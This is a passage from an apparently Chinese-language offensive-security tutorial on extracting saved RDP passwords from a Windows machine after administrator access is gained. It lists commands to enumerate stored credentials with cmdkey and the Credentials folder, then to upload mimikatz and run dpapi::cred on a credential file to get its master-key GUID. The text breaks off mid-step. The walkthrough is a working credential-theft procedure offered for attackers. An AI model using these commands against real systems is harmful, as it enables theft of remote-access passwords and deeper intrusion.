使用mimikatz獲取機器的RDP憑據

當我們拿到了機器的管理員權限後，想獲取其RDP憑據保存的密碼。那麼，該如何操作呢？

首先，執行以下命令查看目標機器是否存在RDP憑據

#查看mstsc的連接紀錄
cmdkey /list 

#查找本地的Credentials：
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

 

存在的話，上傳mimikatz，執行以下命令，記錄 guidMasterKey 值

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\19DC8328D3873E6AB8EF6B081B771D2E"

執行以下值，找到 guidMasterKey 值 對應的 MasterKey。上面的guidMa